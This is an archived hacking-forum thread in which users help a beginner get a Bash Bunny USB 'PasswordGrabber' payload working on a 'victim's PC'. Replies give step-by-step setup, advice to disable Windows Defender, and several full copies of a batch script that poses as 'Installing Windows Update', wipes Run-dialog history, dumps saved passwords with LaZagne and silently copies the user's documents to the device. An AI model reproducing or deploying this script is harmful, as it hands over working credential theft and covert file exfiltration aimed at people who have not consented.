Cech Posted November 15, 2017 Share Posted November 15, 2017 Hey guys, My Bash Bunny just arrived! But there is one problem, I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few codes in different documents so if anyone could tell me how to set it up on BashBunny? https://github.com/hak5/bashbunny-payloads/pull/67 This is the script, but I don't really get it how to place it on BashBunny. Thank you in advance! Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 15, 2017 Share Posted November 15, 2017 1) If you have not yet, update bunny and if so then ignore this. This is just the common first answer you will get and has been the answer to many questions. 2) This payload needs an external project added, the Lazagne project, the compile version for Windows and it has to be in the switch folder with the payload.txt. The compiled version is on the site too or you can follow the directions for the project for Lazagne to do your own compiling. Link to comment Share on other sites More sharing options...
Cech Posted November 17, 2017 Author Share Posted November 17, 2017 I did everything, but nothing seem to work :/ (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder but once I plug it in I get empty directories and also my firmware is 1.4 Link to comment Share on other sites More sharing options...
RazerBlade Posted November 17, 2017 Share Posted November 17, 2017 laZagne.py should not be their. Also, check out my latest pull request on password grabber: fixes and makes somethings a bit easier to understand: https://github.com/hak5/bashbunny-payloads/pull/293/files Link to comment Share on other sites More sharing options...
Cech Posted November 17, 2017 Author Share Posted November 17, 2017 Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain me which files where it goes? Which file should go in the switch and which file to go somewhere else? It's probably easier to understand for you professionals but not for regular people like me :) Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 18, 2017 Share Posted November 18, 2017 I don't remember the e and d files being exes. They were cmd files. Try this. If you got the lazagne.exe then copy it to the machine and run it. According to the command file the command below should display output to the screen. lazagne.exe all -v If you get something then we know lazagne works. Next with the bashbunny in arming mode run the command again but add in " > driveletterofBB:\loot\lazagnetest.txt" where driveletterofBB is the current drive letter of BashBunny. We are just testing here to make sure everything works piece by piece. Link to comment Share on other sites More sharing options...
Cech Posted November 18, 2017 Author Share Posted November 18, 2017 Whenever I open lasagne.exe (directly or through cmd) I get the following error and closes the program within a second. lazaGne.exe: error: too few arguments Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 18, 2017 Share Posted November 18, 2017 Are you including the "all" and the "-v". If Lazagne is not even working then that explains the empty payload folder. Link to comment Share on other sites More sharing options...
D31M0Z Posted November 19, 2017 Share Posted November 19, 2017 in the explorer window shift+right click open powershell/cmd at location then ./laZange.exe all -v shouuld do it Link to comment Share on other sites More sharing options...
D31M0Z Posted November 19, 2017 Share Posted November 19, 2017 when you just double click run it will error Link to comment Share on other sites More sharing options...
Cech Posted November 19, 2017 Author Share Posted November 19, 2017 Ok it works, it found all my passwords, but how do I place it in switch2 so when I place the BashBuny, into victim's PC the script to start attacking and to save all the passwords in loot folder instead of making an empty directories? Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 Place it in the same switch folder as the payload http://fav.me/dbu9s93 This is the line in e.cmd that runs laZange.exe http://fav.me/dbu9smb This is the line for your xcopy command (the one i have inserted pulls any existing MS word docs from the active user profile) http://fav.me/dbu9spt Hope the links worked and it helped! Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 The *'s are 'wildcards' you can replace them with desired target names or change the file extension (.doc) to any desired. Link to comment Share on other sites More sharing options...
Cech Posted November 20, 2017 Author Share Posted November 20, 2017 I just followed all your steps and still, I get an empty directory :/ Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 Could be windows defender blocking LaZange from working, was the only thing I found that would give me an empty password.txt if it was active during scan. It also auto deletes hack tools or quarantines them automatically when active so I always shut it off before arming my bunny. Link to comment Share on other sites More sharing options...
Cech Posted November 20, 2017 Author Share Posted November 20, 2017 Do I need to configure something in these files or I just need ti place them in the "Switch2" directory along with laZagne.exe file? If there is any configuration required to the following files, can you please help me out to sort these things out? d.cmd e.cmd i.vbs payload.txt readme.md Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 Configure the xcopy command in e.cmd to whatever your trying to grab, I also found if I have set up internet share with the bunny it won’t dump files but it still grabs passwords with lazange. If you have sharing turned on in your main network card turn it off when testing the payload. ? lazange.exe/I.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folded so they can be used together. *Also use notepad++ not notepad cause it works better ? Link to comment Share on other sites More sharing options...
Cech Posted November 20, 2017 Author Share Posted November 20, 2017 Is this correct now? e.cmd Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 #the link you provided doesnt work since its a local file not an internet file lol but here is my e.cmd for txt files @echo off @echo Installing Windows Update REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f setlocal #Below uses the laZange.exe in your switch folder cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" #Below runs xcopy to grab file specified by location and file extension (the one below grabs simple .txt documents #Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul) #the line below spams caps lock to tell you that the payload is done and files are coppied (if you have a caps lock led on your keyboard it should blink when the payload finishes.) start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Link to comment Share on other sites More sharing options...
Cech Posted November 20, 2017 Author Share Posted November 20, 2017 First I had to do a little changes because I had an error in the previous saying that "gwin" does not exist (or something like that) so I've added the following code @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again.. Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 the only line i change when comeing frrom a fresh payload copy is: the *'s are wildcards so the xcopy will search any directories or names in the user profile containing txt files. the /C /Q /G /Y are explained below the xcopy command /S makes sure it doesnt grab empty folders if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 4 minutes ago, Cech said: First I had to do a little changes because I had an error in the previous saying that "gwin" does not exist (or something like that) so I've added the following code @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again.. the powershell opening then closing is the first line, everythiing else needs to load so dont prematurely pull the bunny. wait for that caps lock to blink for the okay from the bunny itself. the loot folder should contain a directory labeled with the victim then a txt file containing the lazange scan for example if i were to deploy this in the wild i would make sure it can be inserted and left for at least 5-10 min. to make sure the xcopy command finishes and exits so i don't miss anything. doesnt need to be 5-10 min. (only needs to hit the last line where it flashes caps lock) but it gives me a time frame to wait on then come back to it and pull. Link to comment Share on other sites More sharing options...
Cech Posted November 20, 2017 Author Share Posted November 20, 2017 This is kind a strange..I've copied all your files and when I plugged in the USB I've got the notepad with all the usernames and passwords, so I was like...wow let's try it out again, the second time when I put the USB (was waiting for the caps lock to finish blinking) then I get again empty directories... I was like, let's try once more maybe I did something wrong, I placed the USB inside my computer and again, empty directories.. Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Link to comment Share on other sites More sharing options...
D31M0Z Posted November 20, 2017 Share Posted November 20, 2017 Above is a direct copy of my e.cmd, e.cmd is the only file i ever edit on this payload. **try running it and before pulling the bash bunny try to 'eject' it from windows, if windows gives you an error message saying its busy then xcopy is still running so you need to wait** **BB is fast but you still need to give it time for some payloads, especially exfiltration payloads** **just think about how long it takes you to move pictures or docs into a normal flash drive, the BB does have a great transfer rate though lol** Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.